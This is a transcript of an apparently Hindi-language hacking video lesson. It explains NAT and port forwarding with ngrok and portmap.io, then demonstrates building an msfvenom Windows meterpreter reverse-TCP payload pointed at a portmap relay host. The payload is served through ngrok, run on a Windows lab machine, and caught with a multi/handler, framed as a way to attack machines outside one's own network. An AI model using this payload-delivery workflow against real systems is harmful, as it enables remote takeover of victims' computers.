और आज हम बात करेंगे पोर्ट फॉरवर्डिंग की। तो पिछली कुछ वीडियोस में हमने एक्सप्लॉयटेशन को एक्सप्लोर किया था और उसमें हमने जो भी अटैक्स परफॉर्म किए थे वो अपने लोकल नेटवर्क पे किए थे। बट अगर आपको किसी को अटैक करना हो या कोई अटैक परफॉर्म करना हो ओवर वैन और इंटरनेट, फॉर एग्जाम्पल आप किसी को पेलोड भेजना चाहते हो दैट इज नॉट ऑन योर नेटवर्क, या आप किसी मशीन को हैक करना चाहते हो दैट इज नॉट ऑन योर नेटवर्क, तो आप वो कैसे करोगे? उसके लिए हम एक टेक्निक का यूज करते हैं जिसका नाम होता है पोर्ट फॉरवर्डिंग। तो आज हम इसी बारे में बात करेंगे, तो चलिए शुरू करते हैं। ओके, सो पोर्ट फॉरवर्डिंग समझने से पहले आपको NAT समझना पड़ेगा। सो व्हाट इज NAT? NAT or Network Address Translation is a networking technique that enables the mapping of one IP address space into another by modifying the IP address information in packet headers as they pass through a router or firewall. This process allows multiple devices on a private network to share a single public IP address, which is essential for conserving the limited number of available IPv4 addresses and enhancing security by masking internal IP addresses. तो जैसे कि आपको पता होगा कि हमारे पास दो तरीके के आईपी एड्रेस होते हैं, IPv4 एंड IPv6। अब इनकी जो आपकी नंबर की अवेलेबिलिटी है वो लिमिटेड है। अब IPv4 में जितने आपके नंबर ऑफ एड्रेसेस हो सकते हैं दैट इज अराउंड 4 बिलियन, पर आपको पता है कि हमारे अर्थ पे अभी 4 बिलियन से ज्यादा डिवाइसेस होंगे। ठीक है, आपके घर में ही अगर मैं कंसिडर करूं तो आपके घर में ही 4 से 5 डिवाइसेस होंगे दैट कंसिस्ट ऑफ योर फोन, टैबलेट, पीसी, लैपटॉप, वटेवर। ठीक है, स्मार्ट वॉच वगैरह जो भी नेटवर्क से कनेक्ट होती है चीज, जो भी वाईफाई से कनेक्ट होती है, वो सारा आपका क्या यूज करेगी? आईपी एड्रेस यूज करेगी। तो इसी प्रॉब्लम को टैकल करने के लिए हमने NAT का आविष्कार किया या NAT का यूज होता है। ठीक है, NAT क्या करता है? इसका नाम ही है नेटवर्क एड्रेस ट्रांसलेशन। तो एक आपकी पब्लिक आईपी एड्रेस होती है जो आपका आईएसपी आपको प्रोवाइड करता है, और एक आपकी इंटरनल आईपी एड्रेस होती है। तो जो आप अभी तक आईपी एड्रेस देख रहे थे 192.168.29 से स्टार्ट होने वाली, दैट इज योर प्राइवेट आईपी एड्रेस। वो आपके लोकल नेटवर्क पे काम करती है सिर्फ। ठीक है, उसको आप पब्लिकली जाके सर्च मारोगे ब्राउजर में तो वो काम नहीं करेगी, बिकॉज इट इज अ प्राइवेट आईपी एड्रेस। दूसरी आपकी आईपी एड्रेस होती है दैट इज पब्लिक आईपी एड्रेस। तो जो हमने मास्क करने की कोशिश करते हैं वाइल हैकिंग, जो पिछली वीडियो में हमने देखा अनोनिमस रहने वाले में, जिसमें हमने टॉर्क और प्रॉक्सीज का यूज किया था, उसमें जो आप आईपी एड्रेस छुपा रहे हो दैट इज पब्लिक आईपी एड्रेस। वो आपको आईएसपी आपका प्रोवाइड करता है, और जो आपकी इंटरनेट में पहचान होती है वो उसी पब्लिक आईपी एड्रेस के वजह से होती है। ठीक है, लोकल नेटवर्क में जो आपकी पहचान होती है दैट इज रिप्रेजेंटेड बाय योर प्राइवेट आईपी एड्रेस, और जो इंटरनेट पे आपकी पहचान होती है दैट इज रिप्रेजेंटेड बाय योर पब्लिक आईपी एड्रेस। तो NAT इसके बीच में कहाँ पे आता है? तो आपका जो राउटर होता है उसमें एक सर्विस इंस्टॉल होती है जो होती है NAT। वो क्या करता है? आपकी पब्लिक आईपी एड्रेस को प्राइवेट आईपी एड्रेस में कन्वर्ट करता है, जो भी रिक्वेस्ट आ रही है, और प्राइवेट को पब्लिक में। मान लो आप youtube.com में जाना चाहते हो, वहां एक वीडियो देखना चाहते हो, तो अभी आप अपनी लोकल नेटवर्क में आपका जो पैकेट होगा, जो आप कंप्यूटर से कमांड डालोगे, वो आपके राउटर तक जाएगा। राउटर क्या करेगा? वो देखेगा कि अच्छा इस पर्टिकुलर पीसी से या इस पर्टिकुलर फोन से ये रिक्वेस्ट आ रही है जिसकी आईपी एड्रेस लेस से हो सकती है 192.168.29.150। अब वो उसको ट्रांसलेट करेगा पब्लिक आईपी एड्रेस में। तो जितने भी डिवाइसेस आपके लोकल नेटवर्क से कनेक्ट होते हैं, आपके वाईफाई से कनेक्ट होते हैं, तो आपके वाईफाई को एक पब्लिक आईपी एड्रेस दी जाती है। तो जितने भी एक घर में मान लो एक नेटवर्क से जो कनेक्ट हो रखे हैं, एक वाईफाई नेटवर्क से कनेक्ट हो रखे हैं, जितने भी डिवाइसेस, उन सबका डेटा सिर्फ एक ही पब्लिक आईपी एड्रेस से रिप्रेजेंट होगा, ना कि सबको अलग अलग मिलेगी। उनकी अलग अलग क्या है? अपनी अपनी प्राइवेट आईपी एड्रेस है, पब्लिक सबकी एक होगी। तो NAT क्या काम करता है? उन्हीं में से जिनकी रिक्वेस्ट आएगी उसको कन्वर्ट करेगा, पब्लिक आईपी एड्रेस को बताएगा, और वो पब्लिक आईपी एड्रेस फिर google.com या youtube.com पे जाएगी आपकी रिक्वेस्ट लेके। ठीक है, तो इस तरीके से NAT काम करता है। इसका काम ही ट्रांसलेशन है, बस जो आपकी प्राइवेट आईपी एड्रेस से डेटा आ रहा है उसको पब्लिक में कन्वर्ट करना या उसको पब्लिक तक पहुंचाना, और पब्लिक आईपी एड्रेस उसको आगे फॉरवर्ड करेगी। ठीक है, तो आगे बढ़ते हैं। सो व्हाट इज पोर्ट फॉरवर्डिंग? पोर्ट फॉरवर्डिंग इज अ नेटवर्किंग टेक्निक that allows remote devices to connect to a specific device within a private network by redirecting communication requests from one network address and port number combination to another. This process is essential for enabling external access to services hosting on devices behind a router or firewall, making it possible for applications like online gaming, security cameras, and web servers to function correctly. तो पोर्ट फॉरवर्डिंग एक ऐसी टेक्निक है जिसकी मदद से आप अपने राउटर में एक पोर्ट को ऐसे फॉरवर्ड करते हो या ऐसे एक्सपोज करते हो ताकि वो इंटरनेट से कनेक्टेड डिवाइसेस से डायरेक्टली कम्युनिकेट कर पाए। तो जो आपका लोकल पोर्ट 80 है उससे कोई भी बंदा कनेक्ट होना चाहे तो वो उससे कनेक्ट हो सकता है, एंड वहां से आपका जो भी सर्विस इंटरनल एप्लीकेशन में रन कर रही है, इंटरनल आपके कंप्यूटर में रन कर रही है, उसको एक्सेस कर सकता है। ठीक है, NAT के केसेस में नॉर्मली ये नहीं होता, क्योंकि NAT अलाउ ही नहीं करेगा अगर आप इंटरनल को एक्सेस करना चाहोगे, क्योंकि बाहर आपकी जो आइडेंटिटी है दैट इज योर पब्लिक आईपी एड्रेस। तो अगर आप अपनी प्राइवेट आईपी एड्रेस से या लोकल होस्ट से कनेक्ट करने की कोशिश करोगे बाहर से वाया इंटरनेट, तो आप नहीं कर सकते। वो एक सिक्योरिटी फीचर भी है NAT का, ताकि कोई भी आपके इंटरनल नेटवर्क तक कोई भी आपके कंप्यूटर को डायरेक्टली हैक ना कर पाए। नहीं तो हैकिंग करनी काफी इजी हो जाती आपके कंप्यूटर्स की। ठीक है, अगर आपका NAT नहीं होता। तो पोर्ट फॉरवर्डिंग में हम यही करते हैं,
ये सिक्योरिटी ये एक्सपोज करता है, ठीक है। सिक्योरिटी इसमें कॉम्प्रोमाइज में भी हो सकती है बिकॉज आप अपने लोकल मशीन को एक्सपोज कर रहे हो इंटरनेट पे। बट पोर्ट फॉरवर्डिंग हम यही करते हैं, हम नेट को बाईपास करते हैं, राउटर में एक छेद करते हैं काइंड ऑफ, जिससे हम इंटरनल मशीन को एक्सेस कर पाए अपनी। इसको थोड़ा डिटेल में समझते हैं, एक डायग्राम है मेरे पास यहाँ पे। सो हाउ पोर्ट फॉरवर्डिंग वर्क्स। तो यहाँ पे देखो मेरा इंटरनेट है, ये मेरा राउटर है और मेरी कुछ मशीन्स है यहाँ पे। तो मेरे पास एक राउटर की आईपी एड्रेस है यहाँ पे 78569417 ये पब्लिक आईपी एड्रेस है और इसमें क्या पोर्ट ओपन है, सिर्फ 443 ओपन है। तो इंटरनेट से कोई भी मशीन को कनेक्ट करना होगा मेरे से, तो वो सिर्फ इस पर्टिकुलर आईपी एड्रेस को जानती है और इस पर्टिकुलर पोर्ट नंबर को जानती है। बट लेट से मैं क्या करना चाहता हूँ, मैं चाहता हूँ कि जो इंटरनेट में कोई मशीन है वो मेरा पोर्ट 443 मेरी लोकल मशीन के आईपी एड्रेस पे एक्सेस कर पाए। मेरे पास 3 मशीन है यहाँ पे, मान लो ये पीसी है, ये मोबाइल फोन है, या ये कोई लैपटॉप है, ठीक है। तो मान लो ये लैपटॉप है, तो इस लैपटॉप का जो पोर्ट 443 है मैं उसको एक्सपोज करना चाहता हूँ। यहाँ पे कोई सर्विस चल रही है, ठीक है। अब मैं अगर डायरेक्टली करने की कोशिश करेगा तो वो नहीं कर सकता, क्यों? क्योंकि नेट यहाँ पे है। नेट क्या कर रहा है, इस आईपी एड्रेस से जो भी डेटा आ रहा है वो यहाँ पहुंचता है, उसके बाद वो इसको हटा देता है, इसकी जगह इसको डालता है और आगे फॉरवर्ड करता है, ठीक है। बट अगर मैं उल्टा करने की कोशिश करूँ तो नेट यहाँ पे मुझे रोक देगा। ये काइंड ऑफ फायरवॉल की तरह काम करता है। बट पोर्ट फॉरवर्डिंग हम क्या कर रहे हैं, हम अलाउ कर रहे हैं इस पर्टिकुलर पोर्ट को कि वो डायरेक्टली इंटरनेट से एक्सेस हो पाए। तो हम 443 को क्या कर रहे हैं, एक्सपोज कर रहे हैं। यहाँ पे देखो 443 मैंने करा है, यहाँ पे 443 एक्सपोज कर दिया मैंने यहाँ पे। या पोर्ट 9 को भी कर सकता था, 383 को भी कर सकता था। तो यहाँ पे क्या होगा, 383 आ जाएगा फिर, ठीक है। तो अब जब इंटरनेट से कोई भी मशीन मेरे पब्लिक आईपी एड्रेस पे आएगी, ठीक है, पर्टिकुलर पोर्ट नंबर के लिए, पर्टिकुलर पोर्ट नंबर जरूरी है, उसको पता होना चाहिए। तो जैसे पब्लिक आईपी एड्रेस पे पर्टिकुलर पोर्ट नंबर की रिक्वेस्ट आएगी तो उसको पता है कि इसको डायरेक्टली कहाँ फॉरवर्ड करना है, ठीक है, या यहाँ फॉरवर्ड करना है या यहाँ फॉरवर्ड करना है, डिपेंड्स कि कौन सा पोर्ट हमने एक्सपोज किया है। तो इसी को पोर्ट फॉरवर्डिंग कहते हैं। हम राउटर में एक छेद करते हैं या एक पोर्ट को एक्सपोज करते हैं, जिसमें हम राउटर को ये बताते हैं कि अगर इस पोर्ट में कोई भी रिक्वेस्ट आएगी तो इस पर्टिकुलर मशीन में या इस पर्टिकुलर आईपी एड्रेस में लोकल नेटवर्क की इसको फॉरवर्ड कर देना। सिंपल सा ये है पोर्ट फॉरवर्डिंग। तब इसको प्रैक्टिकली देखते हैं कि हम पोर्ट फॉरवर्डिंग को कैसे यूज कर सकते हैं, ठीक है। सो उसके लिए चलते हैं अपनी काली मशीन में। ऑलराइट, सो मैं आ गया अपनी काली मशीन में यहाँ पे और मैंने एक वेबसाइट खोल रखी है ngRock.com। तो एक पोर्ट फॉरवर्डिंग सर्विस है जिसकी मदद से आप कोई भी पोर्ट को फॉरवर्ड कर सकते हो इस पर्टिकुलर टूल की मदद से, ठीक है। तो इसको यूज करने के लिए आप यहाँ पे साइन अप कर लेना। यहाँ से आप साइन अप कर लोगे तो आपको एक सेटअप पेज पे ले जाएगा, वो इस तरीके का सेटअप पेज होगा, ठीक है। तो यहाँ पे अलग अलग आप आपके डिवाइसेस के लिए कर सकते हो इसको इंस्टॉल, ठीक है। तो अगर मैं नीचे करूँ यहाँ पे तो मुझे लिनक्स का दिखा रहा है। तो अगर आप काली लिनक्स में करोगे तो कुछ नहीं करना है आपको, यहाँ से बस डाउनलोड में जाइएगा, या तो आप यहाँ से इसको डाउनलोड कर सकते हैं, इसकी फाइल को सारा यहाँ पे आपको मिल जाएगी स्टेप बाय स्टेप इंस्टॉलेशन। इसमें कोई मुश्किल वाली बात नहीं है। नहीं तो सिर्फ आपको यहाँ से कॉपी का बटन दबाना है, अपने आप टर्मिनल में जाओ, इसको पेस्ट कर दो, ठीक है। फिर उसके बाद आपको ये और टोकन पेस्ट करना है, वो मैं आपको दिखाऊंगा नहीं। तो मैंने यहाँ पे ऑलरेडी कर रखा है लॉगिन, मैंने ऑलरेडी इंस्टॉल कर दिया ऐसे इंस्टॉल करके, ठीक है। तो जब आप पे इंस्टॉल हो जाता है उसके बाद आपको क्या करना है, चेक कर लेना है एक बार। तो उसके लिए कमांड लगा सकते हो आप टर्मिनल में जाके ngRock, ठीक है। तो ngRock मैंने यहाँ पे कमांड लगाया तो देखो यहाँ पे मुझे क्या मिल रहा है, आउटपुट मिल रहा है। दैट मीन्स ये मेरे सिस्टम में सक्सेसफुली इंस्टॉल हो चुका है। अब इसको यूज करना काफी आसान है, यहाँ पे इन्होंने एग्जांपल दे रखे हैं, ठीक है। तो ngRock पोर्ट 80 अगर आपको करना है, HTTP या TCP आप कर सकते हो, ठीक है। इसके पेड वर्जन भी आता है जिसमें आपको और फीचर्स मिलते हैं, बट फ्री वर्जन में आप नॉर्मली इसका यूज कर सकते हो। TCP के मैं हाल ही में बात करूँ तो आई डोंट थिंक ये TCP अभी सपोर्ट कर रहा है, हम करके देख लेंगे अगर ये सपोर्ट कर रहा होगा। बट इफ नॉट तो हम HTTP का देखते हैं, क्योंकि मोस्टली हम ngRock को उसी के लिए यूज करते हैं। बाकी आप TCP के लिए भी यूज कर सकते हो। तो मान लो मैं अपना जो लोकल होस्ट है उसको मैं एक्सपोज करना चाहता हूँ ऑन द इंटरनेट। तो पहले जो अपना मेरा अपाचे वेब सर्वर है उसको मैं स्टार्ट कर लेता हूँ। तो sudo service apache 2 start, पासवर्ड प्रोवाइड कराया मैंने। एंड अगर मैं अब इसका स्टेटस चेक करूँ तो यहाँ पे एक्टिव दिखा रहा है मुझे, ठीक है। तो अपाचे 2 मेरा चल रहा है। अपाचे 2 क्या है, आपका वेब सर्वर है नॉर्मली। तो अगर मैं यहाँ पे जाऊँ और अपनी आईपी एड्रेस एंटर करूँगा अगर मैं, तो यहाँ पे ब्लैंक स्क्रीन दिखा रहा है, इस पर कुछ ऐड कर लेते हैं। तो cd var www HTML में रहते हैं अपनी, और यहाँ पे कुछ फाइल्स रहती हैं। उसको मैं यहाँ पे अगर index.html को देखूँ, sudo के साथ खोल लेता हूँ उसे मैं, index.html। एंड यहाँ पे एक हम हेडर डाल देते हैं, हेडर टैग डाल देते हैं हम सब्सक्राइब। एंड अगर मैं अब index.html देखूँ, HTML, तो यहाँ पे मैंने कोड यहाँ पे एंटर डाल लिया। क्या करूँगा, ngRock कमांड लगाऊंगा उसके लिए HTTP, बिकॉज ये HTTP वेब सर्वर है अपना, एंड पोर्ट 80 को मैं करना चाहता हूँ, ठीक है। ये मैंने एंटर किया तो यहाँ इस तरीके से आएगा। एंड यहाँ पे मुझे एक URL मिल रहा है, ठीक है। तो इसको अगर मैं कॉपी करूँ यहाँ से, कॉपी लिंक एड्रेस, ठीक है। तो मैंने पेस्ट किया लिंक को, ठीक है। तो इस तरीके की वार्निंग आती है ngRock में, रिसेंटली आनी शुरू हुई है। दूसरी सर्विस जो मेरे पास है दैट इज portmap.io। तो ये भी एक पोर्ट फॉरवर्डिंग सर्विस है।
एंड ये आपके VPN टेक्नोलॉजी का यूज़ लेती है टू पोर्ट फॉरवर्ड। तो इस पर पहले रजिस्टर कर लेते हैं हम इस वेबसाइट में जाके portmap.io में। यहाँ पे आप अपना डिटेल्स दे दीजिए, तो मैं दे देता हूँ। ऑलराइट, सो मैंने डिटेल्स यहाँ पे प्रोवाइड करा दी हैं, तो मैं रजिस्टर पे क्लिक करूंगा। ओके, सो रजिस्ट्रेशन के बाद आपके पास एक एक्टिवेशन लिंक आया होगा आपके ईमेल में। जब आप उसे एक्टिवेट करोगे तो आपके पास इस तरीके का डैशबोर्ड खुल के आ जाएगा। ठीक है, तो ये मेरा डैशबोर्ड है जो आपको पोर्टमैप देता है। तो यहाँ पे हम सबसे पहले क्या करेंगे, क्रिएट न्यू कॉन्फ़िगरेशन पे क्लिक करेंगे। ठीक है, तो यहाँ पे आप कोई भी नेम दे सकते हो। मैं इसको दे देता हूँ नरूटो, मैंने इसको दे दिया नेम। ठीक है, नरूटो नेम दिया मैंने इसे। एंड उसके बाद यहाँ पे मैं ओपन VPN या SSH दोनों का यूज़ कर सकता हूँ। मैं ओपन VPN का करूँगा। प्रोटोकॉल को आप TCP कर दीजिएगा, बिकॉज मोस्ट ऑफ द कनेक्शन हम TCP में करते हैं। एंड उसके बाद आप जनरेट कर सकते हैं यहाँ पे कॉन्फ़िगरेशन फाइल आपकी। ठीक है, तो यहाँ पे कॉन्फ़िगरेशन फाइल आपकी जनरेट हो जाएगी ओपन VPN की। नॉर्मल से आप डाउनलोड पे क्लिक कर सकते हैं। इस तरीके से आपका एक फाइल डाउनलोड हो चुकी है, hayabusa.chingari.naruto.ovpn। ये आपके नाम पे डिपेंड करता है, जो भी आप नाम सेट करोगे उस हिसाब से ये जनरेट कर देगा। ठीक है, अब मैं यहाँ से इसे क्लोज कर सकता हूँ। यहाँ पे अब मैं क्या करूँगा, उसके बाद मैं जाता हूँ कॉन्फ़िगरेशंस में, मैपिंग रूल्स। ठीक है, तो मैपिंग रूल्स में यहाँ पे मैं क्रिएट न्यू रूल पे क्लिक करूँगा। एंड यहाँ पे मेरी कॉन्फ़िगरेशन फाइल नरूटो है, ओपन VPN TCP मैंने सेलेक्ट किया था, प्रोटोकॉल TCP है, होस्ट नेम portmap.host या IO भी कर सकते हैं आप इसे, मैं होस्ट पे रखूँगा। ठीक है, उसके बाद कौन से पोर्ट को आप फॉरवर्ड करना चाहते हो अपने PC में, तो यहाँ पे आपको पोर्ट नंबर डालना पड़ेगा। तो मैं डाल देता हूँ 6699। ठीक है, तो 6699 को मैं फॉरवर्ड करना चाहता हूँ अपने पोर्ट को, जो मेरा लोकल पोर्ट है। एंड अलाउड IP एड्रेस में डालने की सच कोई ज़रूरत नहीं है, यहाँ पे मैं क्रिएट कर सकता हूँ। एंड यहाँ पे एक रूल यहाँ पे मेरा क्रिएट हो चुका है। ठीक है, तो अब इसको मैं यूज़ कैसे करूँगा वो बता देता हूँ। तो मैं चलता हूँ अपने यहाँ पे। एंड सबसे पहले इसको हमें इनेबल करना पड़ेगा जब भी हम यूज़ कर रहे होंगे, क्योंकि ओपन VPN टेक्नोलॉजी का यूज़ कर रहा है। तो ओपन VPN के लिए हम यहाँ पे कमांड लगाते हैं sudo। पहले मैं देख लेता हूँ मेरी फाइल यहाँ पे, तो ये मेरी फाइल है, इसको मैंने कर लिया कॉपी। अब मैं कमांड लगाऊंगा sudo ओपन VPN एंड उसके बाद पेस्ट कर देंगे फाइल का नाम। ठीक है, तो यहाँ से स्टार्ट हो जाएगा। तो इस तरीके से आएगा आपको सीक्वेंस, जब आपको कंप्लीटेड दिखा यहाँ पे इनिशियलाइजेशन सीक्वेंस कंप्लीटेड, दैट मीन्स आप कनेक्टेड हो चुके हो इसके VPN से। अब आप इसका यूज़ ले सकते हो। तो मैं दूसरा टर्मिनल को स्पॉन करता हूँ यहाँ से, एंड इसको थोड़ा बड़ा कर लेते हैं। अब मैं एक पेलोड बनाऊंगा MSF Venom का। सो MSF Venom -p विंडोज इंटरप्रेटर रिवर्स TCP हेल होस्ट। अब हेल होस्ट में क्या देना है आपको, हेल होस्ट इज इक्वल टू, अभी तक आप अपनी लोकल IP एड्रेस दे रहे थे। ठीक है, IP ADDR करके। अब हम यहाँ जाएंगे वापस पोर्ट मैप पे, और ये आपको दिख रहा है यहाँ पे, इसको मैं कॉपी कर लेता हूँ ये पूरा। ठीक है, आपका होस्ट नेम से लेके portmap.host तक इसको मैं करूँगा कॉपी। एंड अभी चलते हैं अपने वापस, और यहाँ पे मैं करूँगा इसका पेस्ट। ठीक है, अब L पोर्ट में आप क्या देंगे, L पोर्ट में आप वापस किसके IP पोर्ट नंबर देंगे, पोर्ट मैप वाला जो यहाँ पे इन्होंने दिया 25047। ठीक है, कॉपी किया एंड पेस्ट कर दिया। उसके बाद फाइल नेम दे देते हैं इसे, फाइल नेम फाइल टाइप है exe एंड फाइल नेम है इसका portmap.exe दे देते हैं। ठीक है, तो मैं एंटर किया, एक फाइल जनरेट होगी यहाँ पे MSF Venom के थ्रू। तो मैं समझा देता हूँ कि यहाँ पे किया क्या हमने MSF Venom टूल किट का यूज़ किया है एक पेलोड बनाने के लिए फॉर विंडोज़। सो विंडोज़ मीटर शेल यूज़ कर रहे हैं हम, एंड जो कनेक्शन होगा वो रिवर्स TCP कनेक्शन होगा। ठीक है, L होस्ट में हमने क्या डाला है, ये इंपॉर्टेंट है, अपनी जो पोर्ट मैप होस्ट है, फाइल है जो या डोमेन है, उसको हमने डाला है। अब ये क्यों डाला है हमने, ठीक है, तो जब भी हमारा पेलोड जो कनेक्ट होगा वो इस पर्टिकुलर होस्ट को देखेगा। ठीक है, एंड इस पर्टिकुलर पोर्ट को देखेगा, जो कि किससे रिलेटेड है, पोर्ट मैप से रिलेटेड है। ठीक है, तो पोर्ट मैप ये क्या करेगा कि इसमें जो भी इसमें डेटा आएगा या जो भी रिक्वेस्ट इस पर्टिकुलर IP एड्रेस या होस्ट नेम बोलो और इस पर्टिकुलर पोर्ट में आएगा, उसको फॉरवर्ड कर देगा हमारे लोकल पोर्ट में, दैट इज 6699। ठीक है, तो जो भी नेट का काम था या वो था, उसको हम बाईपास कर रहे हैं। इस तरीके से हम इस पे जो भी रिक्वेस्ट है इस पे भेजेंगे पहले, और ये फिर फॉरवर्ड करेगा हमारे लोकल पोर्ट पे। ठीक है, तो हमें कनेक्शन इजीली मिल जाएगा। जो टारगेट होगा वो कनेक्ट होगा इस पर्टिकुलर IP एड्रेस और पोर्ट से, और ये हमको आगे फॉरवर्ड कर देंगे। तो ऐसा समझो कि ये फॉरवर्ड करेगा सारी रिक्वेस्ट टू आवर लोकल IP एड्रेस, और ये फॉरवर्ड करेगा सारी रिक्वेस्ट टू आवर लोकल पोर्ट, दैट इज 6699। ठीक है, तो अब हम क्या करेंगे, हमने पेलोड तो बना लिया। अभी मैं चलता हूँ अपने टर्मिनल पे, और मैं अब यहाँ से MSF कंसोल को स्टार्ट कर लेता हूँ मल्टी आई हैंडलर सेटअप करने के लिए। तो MSF कंसोल कमांड लगाया मैंने यहाँ पे, एंड अभी अपना MSF कंसोल स्टार्ट हो जाएगा यहाँ पे। ठीक है, तो MSF Venom स्टार्ट हो गया। अब मैं कमांड लगाऊंगा यूज एक्सप्लॉइट मल्टी हैंडलर लगाया मैंने, एंड सेट पेलोड जो हमने सेट किया था दैट वाज विंडोज इंटरप्रेटर रिवर्स TCP। ठीक है, अब सेट L होस्ट। अब सेट L होस्ट में आपको क्या डालना है,
आप डालोगे 0.0.0.0। अब ये इंपॉर्टेंट है, ये इसलिए इंपॉर्टेंट है क्योंकि जो भी कनेक्शन आपके पर्टिकुलर उसमें आ रहा है, पोर्ट मैप में आ रहा है, वो आपको फॉरवर्ड करेगा पर्टिकुलर आईपी एड्रेस में। तो ये है आपका डिफॉल्ट राउटिंग, ठीक है। तो जो भी कनेक्शन आपके पर्टिकुलर पोर्ट पे आ रहा होगा, ये सिर्फ आप पोर्ट चेक करेगा। तो पोर्ट मैप पे जो भी चीजें आएंगी यहाँ पे, अगर मैं वापस जाऊँ पोर्ट मैप की मैपिंग में, तो कोई भी चीज जब इस पर्टिकुलर होस्ट नेम पे आएगी, कहीं से भी फॉरन, मान लो आपने जो अभी पेलोड आप एग्जीक्यूट कराओगे सिस्टम में, तो पेलोड इसमें कनेक्ट जाके होगा, इस पर्टिकुलर होस्ट नेम पे जाके कनेक्ट होगा, फिर वो इस पर्टिकुलर पोर्ट पे जाके कनेक्ट होगा, ठीक है। तो हम क्या कर रहे हैं, हम बोल रहे हैं कि जो भी डेटा इस उसमें आएगा हमारे सिस्टम में आप भेज देना, आईपी एड्रेस चेक करने की जरूरत नहीं है, ठीक है। तो हम एक तरीके से आईपी एड्रेस की डिपेंडेंसी को बाईपास कर रहे हैं 0.0.0.0 को यूज करके यहाँ पे, ठीक है। तो जो भी डेटा आएगा वो आपके मशीन पे आएगा ही आएगा, आप पर्टिकुलर आईपी एड्रेस पे जाने की जरूरत नहीं, क्योंकि जैसे कि मैंने नेट में आपको बताया था, जो पब्लिक आईपी एड्रेस है वो कहाँ भेजती है डेटा, प्राइवेट आईपी एड्रेस में। पर यहाँ पे हम बोल रहे हैं कि कोई भी डेटा आए इसमें तो आईपी एड्रेस ढूंढने की जरूरत नहीं है कि किस मशीन में भेजना है, ठीक है। हमारी मशीन पे भेज देना, आप बस भेज देना डेटा, और जिस भी मशीन में पोर्ट 6699 आपका ओपन होगा उस पर आप डेटा खुद एक्सेप्ट कर लेंगे हम, ठीक है। तो ये हम यहाँ पे मेंशन कर रहे हैं इससे। एंड लास्ट हम क्या करेंगे, एल पोर्ट सेट करेंगे, कौन सा वाला, इस बार हम करेंगे 6699 एंड एट लास्ट एक्सप्लॉइट। तो अब हमारा मल्टा हैंडलर स्टार्ट हो जाएगा और वो इनकमिंग कनेक्शन लेने को तैयार है, ठीक है। तो यहाँ पे स्टार्ट हो चुका है। अब हमें क्या करना है, हमें ये जो पेलोड है वो विक्टिम को सर्व करना है। तो उसके लिए मैं यहाँ पे जाता हूँ एंड अब हम ngrok का यूज कर लेते हैं, जैसे कि मैंने आपको बताया था, ngrok http एंड पोर्ट 8000 को कर लेते हैं हम यहाँ पे सर्व, ठीक है। तो पोर्ट 8000 यहाँ पे एक्सेस हो चुका है। वापस चलता हूँ मैं, और अब मैं पाइथन सर्वर का यूज करूंगा। पाइथन सर्वर के लिए python 3-m http डॉट सर्वर, तो पोर्ट 8000 यहाँ पे हो चुका है, ठीक है। तो अब मैं वापस चलता हूँ, ngrok का मैं यहाँ से उठाऊंगा। अब चलते हैं अपनी विंडोज मशीन में और पेलोड को डाउनलोड करते हैं। ऑलराइट, सो मैं आ गया अपनी विंडोज मशीन में यहाँ पे, और मैंने फायरफॉक्स ओपन कर लिया है। तो मैंने ऑलरेडी कॉपी कर लिया था वहां से ngrok का लिंक। तो अगर मैं यहाँ पे इसको पेस्ट करूँ, ठीक है, तो एंटर करेंगे हम एंड यहाँ पे ngrok की वार्निंग है, विजिट साइट। एंड देखो यहाँ पे मैं अपना वेब सर्वर एक्सेस कर सकता हूँ, जो रन कर रहा है मेरे लोकल पोर्ट में, 8000 पोर्ट में रन कर रहा है, ठीक है। तो अभी मैं नीचे चलते हैं, और प्रोग्राम जो अपना था दैट वाज portmap.exe, तो मैंने इसको यहाँ से करा एंड ये यहाँ पे आपका डाउनलोड हो चुका है ये रही फाइल। तो अगर मैं इस पर डबल क्लिक करूँ, रन एनीवे, ठीक है, तो अभी एग्जीक्यूट हो चुकी है। अब चलते हैं अपनी काली मशीन में वापस और देखते हैं कि हमें सेशन मिला है कि नहीं मिला है। ऑलराइट, सो मुझे यहाँ पे एक मीटर सेशन मिल चुका है। तो अगर मैं यहाँ पे कमांड लगाऊँ sysinfo, तो यहाँ पे मुझे विंडोज 10 मशीन का एक्सेस मिल चुका है। तो इस तरीके से आप पोर्ट फॉरवर्डिंग कर सकते हैं। मैंने आपको दो टूल्स दिखाए आज, एक पोर्ट मैप और दूसरा ngrok, तो आप दोनों का यूज ले सकते हैं, ठीक है। पर ध्यान रखिएगा कि पोर्ट फॉरवर्डिंग करते वक्त आप अपनी मशीन को भी एक्सपोज कर रहे हो ओवर द इंटरनेट, तो इसमें आपके अटैक होने के चांसेस भी बढ़ जाते हैं, बिकॉज यू आर एक्सपोजिंग योर पोर्ट आउट इन द पब्लिक। तो इससे बेटर मैं आपको सजेस्ट करूंगा कि जो भी अटैक आप परफॉर्म करते हो वो आप अपने लोकल नेटवर्क में ही करें, और जब आपको ओवर द वैन या ओवर द इंटरनेट कोई अटैक परफॉर्म करना होगा तो आप VPS की मदद ले सकते हैं। सो VPS आपके वर्चुअल प्राइवेट सर्वर होते हैं, जो आप सर्वर ले सकते हैं, लिनक्स सर्वर ओवर द क्लाउड, ठीक है। तो अलग अलग आपके पास VPS प्रोवाइडर है, आपका Amazon EWS है एंड आपका डिजिटल ओशन है, लिनोड है, ठीक है, GCP है, गूगल क्लाउड प्लेटफॉर्म। तो इन सारी का आप यूज ले सकते हैं जब आपको कोई भी सेटअप करना होगा ओवर द इंटरनेट आप करेंगे, क्योंकि वो फास्ट भी होगा, रिलायबल भी होगा, ठीक है, और आप एक तरीके से अपने आप को भी एक्सपोज नहीं करेंगे ओवर द इंटरनेट। रही बात पोर्ट फॉरवर्डिंग की, तो देयर आर वेरियस टूल्स, इसके अलावा भी जो मैंने आपको दो दिखाए। सर्वियो है लेकिन वो कई बार डाउन रहता है, ठीक है, तो वो उसका मैं आपको दिखा नहीं पाया। पैकेट रियॉट है, ऐसे करके बहुत सारे हैं, आप सर्च मारेंगे तो आपको मिल जाएंगे। तो इन सारे टूल्स का भी आप यूज ले सकते हैं इफ यू वांट टू डू पोर्ट फॉरवर्डिंग। बाकी आप अपने राउटर में भी कुछ कॉन्फ़िगरेशंस कर सकते हो। डिफरेंट राउटर में डिफरेंट ऑप्शंस होते हैं, इसको सेटिंग्स में जाके आप देख सकते हैं कि अगर पोर्ट फॉरवर्डिंग अलाउ करता है आपका राउटर तो आप वहां से भी कर सकते हैं। बट मैं फिर से बोलूंगा आपको कि अगर आप ऐसा कुछ करते हैं, पोर्ट 